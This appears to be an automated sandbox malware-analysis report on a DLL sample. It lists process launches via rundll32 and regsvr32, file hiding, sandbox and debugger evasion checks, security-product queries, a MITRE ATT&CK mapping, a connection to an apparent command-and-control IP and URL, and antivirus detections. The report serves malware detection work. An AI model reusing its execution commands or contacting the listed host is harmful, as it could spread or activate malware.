File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{EDD38171-5414-11EC-90E5-ECF4BB570DC9}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF1A577BCFE6731D96.TMP

Jump to behavior

Source: classification engine

Classification label: mal68.evad.winDLL@49/135@12/7

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",#1

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4252
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:6436:64:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6760:120:WilError_01

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: Bccw1xUJah.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: Bccw1xUJah.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.340634134.0000000004BE1000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337021751.0000000003024000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.336893374.000000000303F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337276806.0000000003024000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.337195624.000000000302A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.340634134.0000000004BE1000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337050232.000000000302A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.336824489.0000000003044000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.337195624.000000000302A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337050232.000000000302A000.00000004.00000001.sdmp
Source:	Binary string: 2\loaddll32.pdbad source: WerFault.exe, 0000001A.00000002.358937567.0000000002F66000.00000004.00000020.sdmp
Source:	Binary string: aXjjr[jCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.357838123.00000000006D2000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.337004820.000000000301E000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.340634134.0000000004BE1000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337362299.000000000301E000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000001A.00000003.337021751.0000000003024000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337276806.0000000003024000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.340634134.0000000004BE1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000001A.00000003.340634134.0000000004BE1000.00000004.00000001.sdmp
Source:	Binary string: 2\loaddll32.pdb source: WerFault.exe, 0000001A.00000002.358937567.0000000002F66000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.337004820.000000000301E000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337362299.000000000301E000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000176C push ebp; iretd	0_2_1000176D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE36FA1 push ecx; ret	2_2_6EE36F9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE36FA1 push ecx; ret	3_2_6EE36F9F

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6EDCDA40 task,task,VirtualProtect,LoadLibraryA,GetProcAddress,GetProcAddress,task,task,

2_2_6EDCDA40

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Bccw1xUJah.dll

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Frzzoul\kwwohiulewmulvk.tlr

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Frzzoul\kwwohiulewmulvk.tlr:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Rjhfn\nedaia.mzt:Zone.Identifier read attributes \| delete

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\svchost.exe TID: 6316	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3060	Thread sleep time: -180000s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: Amcache.hve.26.dr	Binary or memory string: VMware
Source: Amcache.hve.26.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.26.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.26.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.26.dr	Binary or memory string: VMware, Inc.
Source: svchost.exe, 00000008.00000002.610199490.000002244F061000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: Amcache.hve.26.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.26.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.26.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.26.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.26.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.26.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: svchost.exe, 00000008.00000002.610166029.000002244F04B000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.609607784.0000022449A29000.00000004.00000001.sdmp, svchost.exe, 00000027.00000002.584018650.000001E8CC071000.00000004.00000001.sdmp, svchost.exe, 00000027.00000002.584221057.000001E8CC0E5000.00000004.00000001.sdmp, svchost.exe, 00000027.00000002.584171087.000001E8CC0D4000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.26.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.26.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.26.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.26.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.26.dr	Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: svchost.exe, 0000000A.00000002.776806397.0000025575468000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.775698066.000001871A629000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.26.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6EE3AABA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_6EE3AABA

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6EDCDA40 task,task,VirtualProtect,LoadLibraryA,GetProcAddress,GetProcAddress,task,task,

2_2_6EDCDA40

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10011E59 mov eax, dword ptr fs:[00000030h]	0_2_10011E59
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE3A991 mov eax, dword ptr fs:[00000030h]	2_2_6EE3A991
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE440D3 mov eax, dword ptr fs:[00000030h]	2_2_6EE440D3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE4408F mov eax, dword ptr fs:[00000030h]	2_2_6EE4408F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE44104 mov eax, dword ptr fs:[00000030h]	2_2_6EE44104
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE3A991 mov eax, dword ptr fs:[00000030h]	3_2_6EE3A991
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE440D3 mov eax, dword ptr fs:[00000030h]	3_2_6EE440D3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE4408F mov eax, dword ptr fs:[00000030h]	3_2_6EE4408F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE44104 mov eax, dword ptr fs:[00000030h]	3_2_6EE44104

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10010E34 LdrInitializeThunk,

0_2_10010E34

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE3AABA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6EE3AABA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE3624F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6EE3624F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE37375 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6EE37375
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE3AABA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6EE3AABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE3624F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6EE3624F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE37375 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6EE37375

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 172.104.227.98 187

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",#1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4252 -ip 4252
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 272

Source: rundll32.exe, 0000001C.00000002.780381837.0000000003420000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000001C.00000002.780381837.0000000003420000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 0000001C.00000002.780381837.0000000003420000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: rundll32.exe, 0000001C.00000002.780381837.0000000003420000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 0000001C.00000002.780381837.0000000003420000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_6EE51EAD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,	2_2_6EE44DE4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	2_2_6EE4480E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_6EE5280E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_6EE52639
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	2_2_6EE52235
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	2_2_6EE5219A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	2_2_6EE5214F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	3_2_6EE51EAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6EE44DE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6EE4480E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_6EE5280E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6EE52639
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6EE52235
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6EE5219A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6EE5214F

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6EE370CB cpuid

2_2_6EE370CB

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6EE3729C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_6EE3729C

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: Amcache.hve.26.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.26.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: svchost.exe, 0000000E.00000002.775805030.000002C56A83D000.00000004.00000001.sdmp	Binary or memory string: "@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.776042037.000002C56A902000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Process Injection112	Masquerading21	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery51	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Virtualization/Sandbox Evasion3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	System Information Discovery44	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Regsvr321	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	DLL Side-Loading1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	File Deletion1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Bccw1xUJah.dll	11%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.regsvr32.exe.10000000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
18.2.rundll32.exe.10000000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.2.loaddll32.exe.10000000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
28.2.rundll32.exe.10000000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.10000000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
20.2.rundll32.exe.10000000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.10000000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
5.2.rundll32.exe.10000000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
3.2.rundll32.exe.10000000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.10000000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
https://www.botman.ninja/privacy-policy	0%	Avira URL Cloud	safe
https://www.queryclick.com/privacy-policy	0%	Avira URL Cloud	safe
https://btloader.com/tag?o=6208086025961472&upapi=true	0%	URL Reputation	safe
https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fd3afd4e88e658af134b18abda7a3ae2a.jpg	0%	Avira URL Cloud	safe
https://172.104.227.98/fcNtqWRYEAvIh	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2Fb21b558d-9496-4eb0-b10c-21d698be8cbf_1000x600.jpeg	0%	Avira URL Cloud	safe
https://silvermob.com/privacy	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
https://ad-delivery.net/px.gif?ch=1&e=0.038705726061928736	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/	0%	Avira URL Cloud	safe
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	0%	URL Reputation	safe
http://schemas.m	0%	URL Reputation	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
